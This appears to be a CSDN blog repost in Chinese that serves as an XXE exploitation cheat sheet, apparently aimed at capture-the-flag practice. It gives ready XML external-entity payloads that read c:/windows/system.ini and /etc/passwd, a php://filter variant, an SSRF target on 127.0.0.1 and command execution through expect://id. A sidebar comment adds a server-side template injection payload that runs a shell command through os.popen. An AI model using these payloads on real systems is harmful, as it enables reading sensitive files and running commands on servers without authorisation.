xxe利用

最新推荐文章于 2023-07-20 17:25:11 发布

183****1694

最新推荐文章于 2023-07-20 17:25:11 发布

阅读量90

点赞数

原文链接：https://www.wangguixiu.top/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/xxe%E5%88%A9%E7%94%A8.html

版权

xxe利用

作者: admin
时间: 2021-05-27
分类: 漏洞利用

windows模板
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "file:///c:/windows/system.ini">]>
<something>&test;</something>

linux模板
<!DOCTYPE a[
<!ENTITY test SYSTEM "file:///etc/passwd">]>
<something>&test;</something>

php模板
<!DOCTYPE a[
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">]>
<something>&test;</something>

读文件：file:///etc/passwd
读网页：http://127.0.0.1/flag.php
执行命令：expect://id

标签: xxe

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
xxe利用

xxe利用作者: admin 时间: 2021-05-27 分类: 漏洞利用 windows模板<?xml version="1.0"?><!DOCTYPE a [<!ENTITY test SYSTEM "file:///c:/windows/system.ini">]><something&gt...
复制链接

扫一扫

183****1694 CSDN认证博客专家 CSDN认证企业博客

码龄5年

0: 原创

157万+: 周排名

37万+: 总排名

1万+: 访问

: 等级

88: 积分

7: 粉丝

5: 获赞

3: 评论

14: 收藏

私信

关注

热门文章

最新评论

云演CTF: 012.exec
0000Joker0000: 最后得到flag{exec_to_getshell}，这个怎么解决啊？
云演CTF: 005.Blog
Konmu: {{''.__class__.__bases__[0].__subclasses__()[166].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat /app/6bf85e3329f6da6462a213d75e9f5b6f.py").read()')}}+
云演CTF: 001单身一百年也没用和002单身20年的手速
yangzisujin: 能具体点吗过程

最新文章

目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。